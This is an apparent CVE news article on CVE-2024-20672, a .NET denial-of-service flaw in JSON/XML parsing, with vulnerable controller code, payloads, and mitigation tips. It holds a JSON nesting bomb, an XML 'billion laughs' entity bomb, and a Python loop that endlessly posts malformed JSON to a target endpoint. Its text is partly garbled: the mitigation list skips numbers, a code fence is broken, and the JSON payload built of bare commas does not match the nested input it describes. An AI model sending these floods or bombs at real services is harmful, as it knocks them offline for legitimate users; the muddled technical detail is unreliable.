CVE CyberSecurity Database News

CVE-2024-20672 - .NET Denial of Service Vulnerability – Explained, Explored, and Exploited

Poster -

In early 2024, a critical vulnerability was uncovered affecting the .NET Framework and .NET Core/5+ runtimes, identified as CVE-2024-20672. This weakness exposes thousands of web applications and microservices to potential denial of service (DoS) attacks. In this article, we’ll break down everything you need to know: what it is, how attackers can exploit it, and how you can protect your systems — complete with code snippets and resources for further reading.

What Is CVE-2024-20672?

CVE-2024-20672 targets Microsoft’s .NET runtime library. The vulnerability lets a remote attacker cause an application to consume excessive system resources, potentially crashing the app pool, worker process, or service entirely.

In plain terms, someone could knock your site or API offline simply by sending specially crafted requests — with no authentication or advanced skills needed.

- Vulnerable Products: .NET Framework 3.5-4.8, .NET Core 3.1, .NET 5/6/7, ASP.NET, and others
- Attack Results: Excessive memory/CPU use, unresponsive servers, application restart loops, or complete outages

Technical Details: How Does CVE-2024-20672 Work?

The vulnerability involves how the .NET runtime parses certain malformed payloads, particularly during content deserialization (parsing inputs like JSON or XML). When the parser receives weaponized input, it’s tricked into allocating very large amounts of memory or getting stuck in endless processing loops.

If an attacker automates sending many such requests, your server’s CPU and RAM are quickly exhausted — knocking out legitimate users.

Example vulnerable code

using System.IO;
using System.Text.Json;
using Microsoft.AspNetCore.Mvc;

[ApiController]
[Route("api/[controller]")]
public class UploadController : ControllerBase
{
    [HttpPost]
    public IActionResult Upload([FromBody] JsonDocument data)
    {
        // Insecure: No input validation! Vulnerable if deserialization bombs
        return Ok("Received.");
    }
}

With CVE-2024-20672, a request containing very large or recursive JSON can lock up or fatally break this endpoint, as the parser tries to allocate an absurd amount of memory or run forever.

Here’s a skeleton exploit. Imagine an attacker POSTs this to your vulnerable .NET endpoint

{
  "data": [[[ ... repeat hundreds of thousands of times ... ]]]
}

Or for XML

<!DOCTYPE bomb [
<!ENTITY a "aaaaaaaaaaaaaaaaaaaaaaaa...">
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;">
]>
<data>&b;</data>

These inputs cause the deserializer to either

- Try to build a massive object/array, causing out-of-memory,
- Or trigger recursive expansion (billion laughs / exponential entity expansion), burning CPU.

Automated DoS tool example:

In Python (to flood a .NET service)

import requests
BAD_JSON = '{"data":[' + ','*100000 + ']}'
while True:
    requests.post("https://target/api/upload";, data=BAD_JSON, headers={"Content-Type":"application/json"})

If the server lacks validation and is unpatched, memory/CPU usage will spike after just several requests.

Public API endpoints accepting POST data without input size limits were especially vulnerable.

- Cloud-hosted .NET services could be crashed/restarted repeatedly within minutes.

Original advisory & references

- Microsoft Security Advisory CVE-2024-20672
- GitHub Security Announcement for dotnet/runtime

Patch

Update to the latest patched version listed in Microsoft’s update guide.

2. Restrict JSON/XML Uploads

`csharp

// Example

var options = new JsonSerializerOptions

{
MaxDepth = 32 // or another safe number
};

`

4. Web Server/Proxy Defenses
Configure reverse proxies or load balancers (like NGINX/IIS) to limit client upload size and connection count.

Final Thoughts

CVE-2024-20672 is a textbook denial of service risk — but also a prime example of why safe input handling is critical in modern .NET applications. Even basic API controllers become pit traps without careful guarding and up-to-date libraries.

Read more

- MSRC official CVE-2024-20672 disclosure
- Deep-dive technical write-up (.NET runtime issue)
- OWASP on Denial of Service

Timeline

Published on: 01/09/2024 18:15:50 UTC
Last modified on: 01/14/2024 22:48:45 UTC